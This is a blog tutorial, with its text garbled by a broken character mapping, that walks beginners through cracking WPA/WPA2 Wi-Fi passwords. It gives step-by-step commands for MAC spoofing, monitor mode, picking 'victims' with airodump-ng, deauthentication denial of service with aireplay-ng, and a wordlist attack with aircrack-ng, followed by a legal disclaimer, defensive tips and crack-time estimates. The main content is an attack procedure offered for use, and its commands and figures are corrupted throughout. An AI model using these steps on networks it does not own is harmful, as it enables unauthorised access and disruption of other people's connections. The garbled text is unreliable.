Hacking WPA / WPA2 Encrypted Networks theblogofbryan / June 1 !

2"1 Part ## of $y Network %ecurity How&'o %eries( 1) A*P %poofing fro$ a +obile ,e-ice 2) Hacking WPA / WPA2 Encrypted Networks .'his 'utorial) ) ,efeating %%/ / Encrypted Hi0acking

'arget of Attack( & WPA/WPA2&P%1 Wireless Networks

'ools *e2uired( & Any 3o$puter with 4+ware software installed5 .,ownload Here) & 6acktrack 7 4+ware 4irtual +achine5 .,ownload Here) & 3o$patible Network Adapter5

3o$$on 'er$s ,efined( +A3 Address .+edia Access 3ontrol Address) is a uni2ue identifier assigned to network interfaces for co$$unications on the physical network seg$ent5 WAP .Wireless Access Point) is a de-ice that allows wireless de-ices to connect to a wired network using Wi&8i 6%%#, .6asic %er-ice %et #dentification) is the +A3 address of the WAP E%%#,

.E9tended %er-ice %et #dentification) is the display na$e of the wireless network WPA/WPA2 .Wi&8i Protected Access / Wi&8i Protected Access ##) are two security protocols and security certification progra$s de-eloped by the Wi&8i Alliance to secure wireless co$puter networks5 P%1 .Pre&%hared 1ey) is the ter$ for the password defined in WPA/WPA2 encrypted networks5 6efore we 6egin(

'he $ethods and tools used in this WPA / WPA2 hacking tutorial can be utili:ed without any pre-ious knowledge! howe-er it is best for the attacker to ha-e an understanding of what is going on behind the scenes5 +y 0ob with this tutorial is to break down each step of the attack process and e9plain it in a si$plified $anner5 Assu$ing that the reader of this guide has no pre-ious knowledge with hacking! /inu9! or Network %ecurity! # will take it slow .one step at a ti$e)5 # know this stuff can be inti$idating for beginners! but 0ust follow the steps and you will start to understand the funda$entals of what is going on to be better protected against future $alicious users5

#t is i$portant to note that hacking WEP is si$ple and is widely recogni:ed as an inefficient encryption techni2ue! thus why # ha-e not co-ered it in this tutorial5 Although WEP still e9ists in $any places! $ost wireless networks these days ha-e been configured with WPA/WPA2&P%1 which are -ulnerable to brute force attacks5 # will e9plain that the success of hacking WPA/WPA2&P%1 is only as good as the word list you are co$paring against5

%tep 1( %et up the 4+ware %oftware

,ownload and #nstall *e2uired %oftware .8*EE) 8or the purpose of keeping this blog short! # a$ not going to pro-ide instructions on how to download and install the 4+ware software5 6ut the link and infor$ation to install 4+ware Player can be found below(

http(//www5-$ware5co$/products/player/

After 4+ware is installed! you are going to want to download the 6acktrack 7 * . 2bit) -irtual $achine fro$ the following link5 6acktrack 7 is a /inu9 distribution that is used for $any different types of penetration testing/network security and $uch $ore5 'he download is archi-ed using ;&:ip so you will ha-e to e9tract the contents before using5

http(//www5backtrack&linu95org/a0a9/download<redirect5php=id>6'7* &?N@+E&4+& 25;:

With the software installed! $ake sure you are able to power up the -irtual $achine successfully5 # ha-e both 6acktrack 7 * and the 4+ware 4iew software running off $y A%6 dri-e so # can operate it fro$ any co$puter at any ti$e5 # ha-e not seen any reduction really in perfor$ance because # a$ not really writing to the dri-e while its up and running5

A%6 ,e-ice with 6acktrack B 4+ware Player A%6 ,e-ice with 6acktrack B 4+ware Player

%tep 2( Preparation for the AttackC

#f you are not fa$iliar with co$$and pro$pt or ter$inal then so$e of this $ay look a little foreign but # a$ going to break it down as best # can! and if you follow $y instructions and type e9actly as shown! there should not be any issue and you should be on your way to beco$ing a network penetration tester in no ti$eC

Part #( 4iew Network #nterface #nfor$ation %ince $y internal wireless adapter does not support $onitor $ode! # ha-e purchased an Alfa AWA%" DH /ong&*ange E"2511N A%6 Network Adapter .FG E)5

Alfa AWA%" DH Wireless A%6 Adapter

Alfa AWA%" DH Wireless A%6 Adapter

'his of course is only needed in the case that your internal wireless adapter is not co$patible5 Howe-er! $ost A%6 wireless adapters will work with this process5 # si$ply plug it into $y A%6 port and $ake sure it is recogni:ed in the -irtual $achine5

'o -iew a list of the recogni:ed interfaces! open up the console and type in the following co$$and and press enter5

ifconfig ifconfig H co$$and to -iew interfaces

ifconfig co$$and ifconfig co$$and

We need to shut down the interface before we spoof the +A3 address because the interface cannot be in operation during this ti$e5'ype the below co$$and and press enter

ifconfig wlan" down wlan" H network interface down H shut down interface

ifconfig down co$$and ifconfig down co$$and

Now we can spoof the +A3 address of the network adapter! in this case we are 0ust going to set a static IphonyJ +A3 address of ""(11(22( (KK(775 'ype the below co$$and and press enter5

$acchanger &$ ""(11(22(

(KK(77

$acchanger H co$$and to spoof +A3 Address &$ ""(11(22( (KK(77 H specifying the +A3 Address to spoof

'hen after! we need to turn on the interface after the spoofed +A3 address succeeded5 'ype the below co$$and after +A3 address spoof is finished and press enter

iwconfig wlan" up up H turn interface on

$acchanger co$$and $acchanger co$$and

Part ##( Enable I+onitor +odeJ on your Network Adapter +onitor $ode will allow your network adapter to -iew all network traffic within range! along with identifying infor$ation for each network found5 'his co$$and will acti-ate $onitor $ode on $on"5 Lou will be presented with a $essage stating that I+onitor $ode enabled on $on"M

air$on&ng start wlan" air$on&ng H co$$and for $onitor $ode start wlan" H starting $onitor $ode on wlan" interface

$onitor $ode co$$and $onitor $ode co$$and

Part ###( 4erify I+onitor +odeJ is enabled

4erify $on" on the list of interfaces5 'o see the configuration of the $onitor $ode interface! type the following co$$and and press enter5 Lou should then see $on" listed in the co$$and results

iwconfig $on" iwconfig H co$$and to -iew interface configuration $on" H interface used in $onitor $ode

4erify +onitor +ode 4erify +onitor +ode

At this point! all the preparation is co$plete and we are now ready to $o-e on to the fun stuff5 'he ne9t stage will be choosing what network to perfor$ the attack on5 /egal note( Hacking into networks is illegal! $ake sure you ha-e been granted per$ission to test! or perfor$ this on your own e2uip$ent5 # cannot be liable for any $isuseC

%tep ( 6egin the AttackC

Now that the network interface is configured properly to $onitor network traffic within range! we can proceed to selecting a target and perfor$ing the actual brute force attack5

Part #( 3hoose your -icti$C /ets take a look at so$e of the network traffic within range of the wireless adapter5 With the console still open! type in the following co$$and and hit enter5

airodu$p&ng $on" airodu$p&ng H co$$and to -iew networks in range

/ist of 4icti$s /ist of 4icti$s

As described abo-e! you will be presented with an acti-e list of all networks within range5 'he network that # ha-e selected is $y own5 Lou see it labeled as IHack'hisWi8iJ5 Here is the infor$ation that we will need for the ne9t set of co$$ands5

E%%#,( Hack'hisWi8i 6%%#,( ""(2 (DN(NE(A3("7 3hannel( K Encryption( WPA Authentication( P%1

Part ##( 4iew all clients connected to Access Point Now that we know which network to attack! we ha-e to $onitor that specific network and re-eal any clients that $ay or $ay not be connected at that gi-en ti$e5 #n order for WPA / WPA2 hacking to work! it $ust capture the K&way handshake that is acco$plished when the client authenticates to the access point .AP)5

Not only will we be -iewing connected clients! but we will be capturing data specific to the Hack'hisWi8i access point and storing it to a capture file called IhackwpaJ! type the following co$$and and press enter5

airodu$p&ng &&bssid ""(2 (DN(NE(A3("7 &c K &w hackwpa $on" ""(2 (DN(NE(A3("7 H Access Point +A3 Address &c K H 3hannel K &w hackwpa H write to file IhackwpaJ $on" & network interface

4iew 3lients of Access Point 4iew 3lients of Access Point

Part ###( ,o% the Access Point ,enial of %er-ice .,o%) is a good way to accelerate the process of capturing the K&way handshake because it sends a $essage to the client saying that that it is no longer associated with the Access Point5 'he reauthentication is what generates the K&way authentication handshake we are interested in collecting5 'his is what we use to break the WPA/WPA2 pre&shared key5

'he following co$$and will deauthenticate clients to hopefully force the$ to reauthenticate5

aireplay&ng &" " &a ""(2 (DN(NE(A3("7 $on" &" " H %end " ,eAuth re2uests &a ""(2 (DN(NE(A3("7 H Access Point +A3 Address $on" H Network #nterface

,eauthenticate AP clients ,eauthenticate AP clients

Now that the clients ha-e been deauthenticated fro$ the AP! and the handshake has been captured sucessfully! we can start to process of cracking the P%15 .And you thought you were safeC O&O)

%tep K( 'i$e for PWNA?EC

'i$e to 3rack the WPA / WPA2 Encryption using Aircrack

'o acco$plish this! you $ust ha-e so$e type of wordlist to co$pare against the captured P%15 #t essentially will check down the wordlist one by one until it reaches the correct key5 'his can be a -ery ti$e consu$ing process and it takes 2uite a bit of processing power to e9ecute5 'he faster your co$puter! the faster the key can be cracked5 %ee the fun facts at the botto$ of this post to get an understanding of password reco-ery speeds5 'here is also s$all dictionary that co$es with aircrack&ng H Ipassword5lstJ5 'he file is found in the ItestJ directory of the aircrack&ng source code5 Just send $e an e$ail and # can either send you $y wordlist or show you how to create your own using crunch .default with 6acktrack 7 * )5

Ase the below co$$and to start the cracking5

aircrack&ng &w wordlist5lst &b ""(2 (DN(NE(A3("7 hackwpaP5cap aircrack&ng H co$$and for the password cracker &w wordlist5lst H specifying the wordlist to use .wordlist5lst) &b ""(2 (DN(NE(A3("7 H specifying the bssid of the AP hackwpaP5cap H specifying the capture file

Aircrack co$$and to crack P%1 Aircrack co$$and to crack P%1

/et the password cracker work with as $uch processing resources as possible! it could take a long ti$e depending on the co$ple9ity of the Wi8i password used5 #n $y case! # placed the P%1 near the top of the te9t file so # did not ha-e to wait -ery long for the cracker to parse the wordlist one by one5 'his would not be possible if # was not aware of the P%1 prior! and # would ha-e to wait until e-ery string in the wordlist is co$pared5

WPA / WPA2 Hack 3o$plete WPA / WPA2 Hack 3o$plete

Protection Against 6rute 8orce WPA / WPA2 Attacks

'here are $any ways to help protect and defend against brute&force attacks! here are a few tips to keep your Wi8i a little safer fro$ $alicious intruders

%etup +A3 Address 8iltering on *outer 'his $akes it so that only specifically IwhitelistedJ de-ices are able to connect to your network5 6ut as you know! a sa--y hacker can also $onitor the +A3 address of a whitelisted client and then spoof their own +A3 to gain access5 +ost of the ti$e! this is not the caseQ

Ase a 3o$ple9 Passphrase( Asing a co$bination of special characters! lowercase and uppercase letters! and also nu$beric characters can $ake the process of brute&forcing so ti$e intensi-e that a hacker $ay 0ust gi-e up and $o-e to an easier target5 8or $y own network! # do not use a passphrase less than 17 characters in length5 An e9a$ple of a IsafeJ password would be I'h %$1'h8R$i1yWirElesGNe'w"rk2"1 M5 6y using a relati-ely easy sentence and changing so$e characters around to dra$atically increase the co$ple9ity! it would take years for this password to be brute&forced5

3hange the Password 8re2uently( /ike shown abo-e! it could take hours! weeks! e-en years to brute&force passwords5 #f you change it on a regular basis! then you are going to be one step ahead of your potential attacker5

'urn off your router when you are not ho$e( #f you are not using the Wi8i when you are away! why ha-e it on= #t only allows an attacker $ore ti$e to find -ulnerabilities to gain access5 #f you only ha-e your Wi8i on when you are ho$e! then you are drastically reducing the attack&ti$e of the $alicious hacker

8un 8acts(

%o$e interesting statistics regarding password reco-ery speeds5 'his speeds listed here are esti$ates of the $a9i$u$ ti$e it would take a co$$on dual&core workstation to brute force -arious types of passwords5 1eep in $ind that a lot of people these days ha-e 2uad&cores or clusters of co$puters that $ake the password reco-ery speeds drastically $ore efficient5

Nu$erals S"&NT "12 K7D;EN 1" 3haracter Password( 2 U Hours

@nly Apper 3ase Alpha SA&VT &or& @nly /ower 3ase Alpha Sa&:T A63,E8?H#J1/+N@PW*%'A4WXLV &or& abcdefghi0kl$nop2rstu-w9y: E 3haracter Password( 7 U Hours

@nly Apper 3ase Alpha SA&VT &or& @nly /ower 3ase Alpha Sa&:T B Nu$erals S"&NT "12 K7D;ENA63,E8?H#J1/+N@PW*%'A4WXLV &or& "12 K7D;ENabcdefghi0kl$nop2rstu-w9y: 7 3haracter Password( #nstant

Apper 3ase Alpha SA&VT B /ower 3ase Alpha Sa&:T Aa6b3c,dEe8f?gHh#iJ01k/l+$Nn@oPpW2*r%s'tAu4-WwX9LyV: E 3haracter Password( D2 ,ays

Apper 3ase Alpha SA&VT B /ower 3ase Alpha Sa&:T B Nu$erals S"&NT "12 K7D;ENAa6b3c,dEe8f?gHh#iJ01k/l+$Nn@oPpW2*r%s'tAu4-WwX9LyV: E 3haracter Password( 27 ,ays

Apper 3ase Alpha SA&VT B /ower 3ase Alpha Sa&:T B %pecial 3har Aa6b3c,dEe8f?gHh#iJ01k/l+$Nn@oPpW2*r%s'tAu4-WwX9LyV:CJYGZ[\.)PB!&5/(]= RS^TO<_`abF E 3haracter Password( 2 Lears

As always! thanks for reading and please $ake sure to drop a co$$ent below with your thoughts5 ,on\t forget to %ubscribeC

&6ryan